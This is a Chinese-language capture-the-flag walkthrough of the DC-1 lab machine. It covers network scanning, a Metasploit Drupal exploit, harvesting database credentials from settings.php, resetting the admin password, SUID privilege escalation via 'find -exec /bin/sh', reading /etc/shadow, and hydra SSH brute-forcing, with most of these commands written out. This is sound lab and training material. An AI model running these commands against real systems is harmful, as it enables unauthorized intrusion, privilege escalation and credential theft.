环境准备:
渗透机:kali2023-------IP:192.168.219.169
靶机:DC-1
渗透目标:夺取目标机器控制权,拿到5个flag
一、嗅探
arp-scan -l
发现目标主机:192.168.219.167
进一步扫描
nmap -T4 -A -sS 192.168.219.167
二、渗透
发现目标开启Web服务,以及网站框架,打开火狐访问目标站点
界面并无渗透点
flag1
查询框架漏洞-------可以用漏洞库查询,也可以用metasploit(这里使用后者)
有时间可以把几个漏洞试一试,我这里尝试使用比较新的漏洞1
查看漏洞使用所需要的参数(options)
配置参数
1、设置攻击目标(set rhost)
因为目标端口为80,与默认配置端口相同,无需配置,可直接运行
获取shell并使用交互模式
获取到flag1
flag2
根据flag1提示,查询网站框架drupal默认配置文件
(可以百度查询,也可直接搜索文件查找)-------(/var/www/sites/default/settings.php)
获取到flag2
flag3
根据flag2,获得数据库账号密码,所以进一步访问数据库
查看数据库
查询到网站管理员用户,但是密码被加密了
修改用户admin密码(这里有个问题,如何知道他的加密规则。可以自行去百度搜索。。。或者在网站目录下查找scripts文件,一般密码加密都在此文件中)
更新admin密码
下一步登录网站后台,发现flag3
flag4
根据flag3(PERMS、FIND、-exec、shadow)
使用find命令查找有特殊权限suid的命令
find / -perm -4000
find命令提权
find ./ aaa -exec '/bin/sh' \;
查找 shadow 路径
whereis shadow
读取shadow内容
cat /etc/shadow
发现flag4,为一个账户,但是密码加密了
进一步根据嗅探得到的,目标开启了ssh服务(22端口)
首先破解密文(另开一个终端)
wget http://www.openwall.com/john/j/john-1.8.0.tar.gz #下载John密码包
tar -xvf john-1.8.0.tar.gz #解压缩
cd john-1.8.0/ src #进入源码目录下
uname -a #查看当前系统版本
make linux-x86-64 #编译并指定当前的Linux系统版本
破解密码(记得退出编译路径)
hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.219.167 -f -vV -o hydraflag4.ssh
找到flag4
flag5
根据flag4,直接利用root查看flag5